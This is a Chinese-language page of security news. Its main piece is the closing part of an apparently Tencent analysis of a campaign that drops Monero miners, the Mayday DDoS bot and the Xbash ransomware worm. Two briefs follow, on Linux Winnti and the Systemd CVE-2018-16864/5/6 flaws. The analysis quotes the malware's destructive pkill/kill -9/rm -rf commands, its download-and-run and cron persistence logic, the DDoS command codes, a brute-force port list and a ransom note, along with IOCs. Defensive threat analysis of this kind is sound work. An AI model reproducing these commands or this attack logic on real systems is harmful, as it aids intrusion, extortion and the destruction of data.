钱包:4AggMSAnFrQbp2c6gb98BZDBydgmjNhhxdN4qBSjwc3BDNQZwg5hRqoNczXMr7Fz6ufbwVaJL8sJmTdrp2dbKYcFRY2pe33 该钱包上线时间不长,查询收益目前仅获得0.7个XMR 2、服务“DNS” 对应执行的脚本为open.bat。功能为替换本地域名解析文件hosts,然后启动挖矿程序。 替换后的hosts文件将其他的矿池域名解析指向127.0.0.1,阻止其正常访问从而独占挖矿所需的计算资源。从该文件中还会将木马原来的C2地址从111.230.195.174迁移至116.206.177.144。 open.bat还会启动qc.bat来清除入侵过程中在xampp、www、phpstudy目录下载残留的EXE木马,以及badboy.php、test00.php木马。 3、服务“skycmd” 执行脚本skycmd.bat。功能为下载skycmdst.txt,重命名为skycmdst.bat并执行,目前下载该文件为网页文件,但黑客可通过后台配置动态更改下载的恶意代码。 s667 s667为入侵Linux系统后首先执行的脚本。脚本判断当前是否是root权限,如果不是则下载lower23.sh到/tmp/目录并通过nohup bash命令执行;如果是root权限则添加下载执行s667的定时任务,每5分钟执行一次,然后下载rootv23.sh到/tmp/目录并通过nohup bash命令执行。 最终下载执行的bash脚本lower23.sh或root23.sh负责植入Linux版本挖矿木马、清理竞品挖矿木马以及植入其他病毒等功能。 在function kills()中对竞品挖矿木马进行清除: 1、按照进程名匹配(包括被安全厂商多次披露的利用redis入侵挖矿的木马“ddg*”、“sourplum”、”wnTKYg”)。 pkill -f sourplum pkill wnTKYg && pkill ddg && rm -rf /tmp/ddg && rm -rf /tmp/wnTKYg pkill -f biosetjenkins pkill -f Loopback pkill -f apaceha pkill -f cryptonight pkill -f stratum pkill -f mixnerdx pkill -f performedl pkill -f JnKihGjn pkill -f irqba2anc1 pkill -f irqba5xnc1 pkill -f irqbnc1 pkill -f ir29xc1 pkill -f conns pkill -f irqbalance pkill -f crypto-pool pkill -f minexmr pkill -f XJnRj pkill -f NXLAi 2、按照矿池匹配,杀死连接指定矿池的进程 ps auxf|grep -v grep|grep “mine.moneropool.com”|awk ‘{print $2}’|xargs kill -9 ps auxf|grep -v grep|grep “xmr.crypto-pool.fr:8080″|awk ‘{print $2}’|xargs kill -9 ps auxf|grep -v grep|grep “xmr.crypto-pool.fr:3333″|awk ‘{print $2}’|xargs kill -9 ps auxf|grep -v grep|grep “monerohash.com”|awk ‘{print $2}’|xargs kill -9 ps auxf|grep -v grep|grep “/tmp/a7b104c270″|awk ‘{print $2}’|xargs kill -9 ps auxf|grep -v grep|grep “xmr.crypto-pool.fr:6666″|awk ‘{print $2}’|xargs kill -9 ps auxf|grep -v grep|grep “xmr.crypto-pool.fr:7777″|awk ‘{print $2}’|xargs kill -9 ps auxf|grep -v grep|grep “xmr.crypto-pool.fr:443″|awk ‘{print $2}’|xargs kill -9 ps auxf|grep -v grep|grep “stratum.f2pool.com:8888″|awk ‘{print $2}’|xargs kill -9 ps auxf|grep -v grep|grep “xmrpool.eu” | awk ‘{print $2}’|xargs kill -9 3、按照端口匹配,杀死使用端口9999/5555/7777/14444进行tcp通信的进程 PORT_NUMBER=9999 lsof -i tcp:${PORT_NUMBER} | awk ‘NR!=1 {print $2}’ | xargs kill -9 PORT_NUMBER=5555 lsof -i tcp:${PORT_NUMBER} | awk ‘NR!=1 {print $2}’ | xargs kill -9 PORT_NUMBER=7777 lsof -i tcp:${PORT_NUMBER} | awk ‘NR!=1 {print $2}’ | xargs kill -9 PORT_NUMBER=14444 lsof -i tcp:${PORT_NUMBER} | awk ‘NR!=1 {print $2}’ | xargs kill -9 4、删除指定目录文件 rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius rm -rf /tmp/index_bak rm -rf /tmp/httpd.conf rm -rf /tmp/*httpd.conf rm -rf /tmp/a7b104c270 rm -rf /tmp/httpd.conf rm -rf /tmp/conn rm -rf /tmp/conns rm -f /tmp/irq.sh rm -f /tmp/irqbalanc1 rm -f /tmp/irq 在function downloadyam()中下载Linux挖矿程序bashg(由开源GPU挖矿程序xmr-stak编译)和配置文件pools.txt;下载Linux平台CPU挖矿程序bashf(采用开源挖矿程序XMRig编译)以及配置文件名config.json。两种挖矿程序均使用与攻击Windows平台时相同的门罗币矿池和钱包。 DDoS病毒 lower23.sh在完成挖矿功能后,还会植入基于Linux的DDoS病毒lst(国外厂商命名为Mayday) lst搜集以下信息,并将其保存至结构g_statBase中: 系统版本 CPU核心数及其时钟速率 CPU负载 网络负载 创建一个新线程CThreadTaskManager :: ProcessMain(),将开始攻击和终止攻击的命令放入执行队列。在此之后,创建一个新线程CThreadHostStatus :: ProcessMain(),在此线程中,CPU和网络负载的数据每秒更新一次,如果接到请求,可以随时将数据发送到C&C服务器。 然后创建20个线程,从任务队列中读取信息,并根据读取的信息启动攻击或终止攻击。 建立与C&C的连接后,进入处理来自C&C的消息的无限循环。如果命令具有参数,则C&C则会发送另外4个字节,病毒根据接收到的不同参数执行不同类型的DDoS攻击。 执行DDoS攻击命令协议如下: 0×01 发起攻击,参数定义攻击的类型和要使用的线程数。攻击类型由一个字节定义,该字节可以取值0x80到0x84,共有5种攻击类型: 0x80 – TCP洪水攻击。 0x81 – UDP洪水攻击。 0x82 – ICMP洪水攻击。 0x83,0x84 – 两次DNS洪水攻击。两种攻击都类似于0x81,除了端口53(DNS服务的默认端口)用作目标端口。 0x02 终止攻击。 0x03 更新配置文件。 0x04 用于将当前命令的执行状态发送到C&C服务器。 勒索蠕虫 lower23.sh继续植入在基于Linux平台执行的勒索蠕虫病毒Xbash Xbash为使用PyInstaller将Python代码打包生成的ELF格式可执行程序,用于感染Linux系统。使用工具pyi-archive_viewer可提取出其中的pyc文件,然后通过反编译程序将其还原成Python代码。 Xbash会通过弱口令爆破和已知的服务器组件漏洞进行攻击,而且会删除目标系统中的数据库,在删除数据后提示勒索比特币,然而并没有发现其具有恢复数据的功能。 扫描端口: HTTP:80,8080,8888,8000,8001,8088 VNC:5900,5901,5902,5903 MySQL:3306 Memcached:11211 MySQL/MariaDB:3309,3308,3360 3306,3307,9806,1433 FTP:21 Telnet:23,2233 PostgreSQL:5432 Redis:6379,2379 ElasticSearch:9200 MongoDB:27017 RDP:3389 UPnP/SSDP:1900 NTP:123 DNS:53 SNMP:161 LDAP:389 Rexec:512 Rlogin:513 Rsh:514 Rsync:873 Oracle数据库:1521 CouchDB:5984 对于某些服务,如VNC,Rsync,MySQL,MariaDB,Memcached,PostgreSQL,MongoDB和phpMyAdmin,如果相关端口打开,则使用内置的弱用户名/密码字典进行爆破登录 爆破登录成功后对用户的数据库进行删除: 然后在数据库中创建勒索提示文本PLEASE_README_XYZ,勒索金额为0.02个比特币: Send 0.02 BTC to this address and contact this email with your website or your ip or db_name of your server to recover your database! Your DB is Backed up to our servers!If we not recived your payment,we will leak your database’, LygJdH8fN7BCk2cwwNBRWqMZqL1′,’backupsql@pm.me 三、安全建议 加固服务器,修补服务器安全漏洞,对于phpStudy一类的集成环境,在安装结束后应及时修改MySQL密码为强密码,避免被黑客探测入侵。 服务备份重要数据,并进行内网外网隔离防止重要数据丢失。检查并去除VNC、Rsync、MySQL、MariaDB、Memcached、PostgreSQL、MongoDB和phpMyAdmin等服务器使用的弱口令。 网站管理员可使用腾讯云网站管家智能防护平台(网址:https://s.tencent.com/product/wzgj/index.html),该系统具备Web入侵防护,0Day漏洞补丁修复等多纬度防御策略,可全面保护网站系统安全。 使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。 IOCs IP 116.206.177.144 Domain down.ctosus.ru wk.skjsl.com fk3.f3322.org sbkcbig.f3322.net URL http[:]//down.ctosus.ru/bat.exe http[:]//wk.skjsl.com:93/s667 http[:]//wk.skjsl.com:93/lowerv23.sh http[:]//wk.skjsl.com:93/rootv23.sh http[:]//wk.skjsl.com:93/xlk http[:]//wk.skjsl.com/wrsngm.zip http[:]//wk.skjsl.com/downulr.txt http[:]//wk.skjsl.com/config.sjon http[:]//wk.skjsl.com/bashf http[:]//wk.skjsl.com/bashg http[:]//wk.skjsl.com/pools.txt http[:]//wk.skjsl.com/lst http[:]//wk.skjsl.com/XbashH http[:]//wk.skjsl.com/NetSyst96.dll http[:]//www.kuaishounew.com/Down.exe http[:]//www.kuaishounew.com/apps.txt http[:]//www.kuaishounew.com/hook.exe http[:]//www.kuaishounew.com/hehe.exe http[:]//www.kuaishounew.com/office.exe http[:]//www.kuaishounew.com/hehe.exe http[:]//www.kuaishounew.com/hosts http[:]//116.206.177.144/wrsngm.zip http[:]//fk3.f3322.org/skycmdst.txt md5 51d49c455bd66c9447ad52ebdb7c526a fb9922e88f71a8265e23082b8ff3d417 cacde9b9815ad834fc4fb806594eb830 17f00668f51592c215266fdbce2e4246 40834e200ef27cc87f7b996fe5d44898 3897bdb933047f7e1fcba060b7e49b40 39ea5004a6e24b9b52349f5e56e8c742 8fdfe319255e1d939fe5f4502e55deee 13f337029bae8b4167d544961befa360 1b93e030d2d6f1cef92b2b6323ff9e9e 589ba3aac5119fc4e2682bafb699727b 82d28855a99013c70348e217c162ceb9 门罗币钱包1: 4Ak2AQiC1R4hFmvfSYRXfX6JSjR6YN9E81SRvLXRzeCefRWhSXq3SKDf8ZEFmpobNkXmgXnqA3CGKgaiAEJ2pjYi8BeQcn7 门罗币钱包2: 4AggMSAnFrQbp2c6gb98BZDBydgmjNhhxdN4qBSjwc3BDNQZwg5hRqoNczXMr7Fz6ufbwVaJL8sJmTdrp2dbKYcFRY2pe33 比特币钱包: 1jqpmcLygJdH8fN7BCk2cwwNBRWqMZqL1 邮箱: backupsql@pm.me 参考链接 https://www.freebuf.com/column/195035.html https://www.freebuf.com/column/178753.html https://securelist.com/versatile-ddos-trojan-for-linux/64361/ https://unit42.paloaltonetworks.com/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/

研究人员发现 Linux 版本的 Winnti 恶意软件

据外媒报道,Alphabet网络安全部门Chronicle的研究人员,发现了Linux版本的Winnti恶意软件。这是研究人员首次发现Winnti的Linux版本,其与中国APT组织有关。 研究人员认为,在Winnti Umbrella黑客组织的背后,有几个APT组织,包括Winnti,Gref,PlayfullDragon,APT17,ViceDog,Axiom,BARIUM,LEAD,PassCV,Wicked Panda和ShadowPad。 这些组织使用相似的策略、技术和程序(TTP),在某些情况下,甚至共享攻击手段。 研究人员在其VirusTotal平台上搜索Winnti恶意软件的样本时,发现了Linux版本的Winnti恶意软件,其可以追溯到2015年,当时被黑客用于攻击越南一家游戏公司。 根据Chronicle发布的报告,Winnti恶意软件采用模块化结构,使用插件实现不同的功能。通过进一步分析发现,Linux版本的Winnti和Winnti 2.0 Windows版本之间有许多相似之处,Linux版本也使用多种协议处理出站通信,如ICMP,HTTP以及自定义TCP和UDP协议等。Linux版本还允许黑客直接访问受感染系统。 Linux用途的扩展可能暗示了黑客们下一个目标的操作系统要求,但也可能只是尝试利用许多企业的安全盲点,与Penquin Turla和APT28的Linux XAgent变体一样。   消息来源:SecurityAffairs, 译者:Vill,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

Systemd 曝出三个漏洞 绝大部分 Linux 发行版易受攻击

Linux 系统与服务管理工具 Systemd 被曝存在 3 大漏洞,影响几乎所有 Linux 发行版。Systemd 是 Linux 系统的基本构建块,它提供了对系统和服务的管理功能,以 PID 1 运行并启动系统的其它部分。目前大部分 Linux 发行版都以 Systemd 取代了原有的 System V。 安全公司 Qualys 近日发布报告称其发现 Systemd 中存在 3 个安全漏洞,并且这些漏洞已经存在 3 到 5 年时间。 3 个漏洞已经收录到 CVE,分别是内存损坏漏洞 CVE-2018-16864 与 CVE-2018-16865、信息泄露漏洞 CVE-2018-16866。其中,CVE-2018-16864 于 2013 年 4 月引入(systemd v203),并在 2016 年 2 月可利用(systemd v230),研究人员写了一个 PoC,可在 i386 上获得 eip 控制。 CVE-2018-16865 于 2011 年 12 月引入(systemd v38),在 2013 年 4 月可利用(systemd v201)。CVE-2018-16866 于 2015 年 6 月引入(systemd v221),于 2018 年 8 月无意中被修复。 研究人员为 CVE-2018-16865 和 CVE-2018-16866 写了一个 PoC,并利用它进行测试,结果花 70 分钟就可以在 amd64 上获得本地 root shell,而在 i386 上只花了 10 分钟。 “所有使用 Systemd 的 Linux 发行版都存在漏洞,并且易受到攻击”,研究人员表示:“但在 SUSE Linux Enterprise 15、openSUSE Leap 15.0 和 Fedora28 与 29 上,这些漏洞无法利用,因为它们的用户空间使用了 GCC 的 -fstack-clash-protection 进行编译。” GCC 中的 -fstack-clash-protection 选项用于生成代码以防止堆栈冲突样式攻击(stack clash style attacks),启用此选项后,编译器将一次只分配一页堆栈空间,并在分配后立即访问每个页面。因此,它可以防止分配跳过处于操作系统保护下的任何堆栈页面。 Qualys 表示不久后将发布相关漏洞 exploit。   稿源:开源中国,封面源自网络;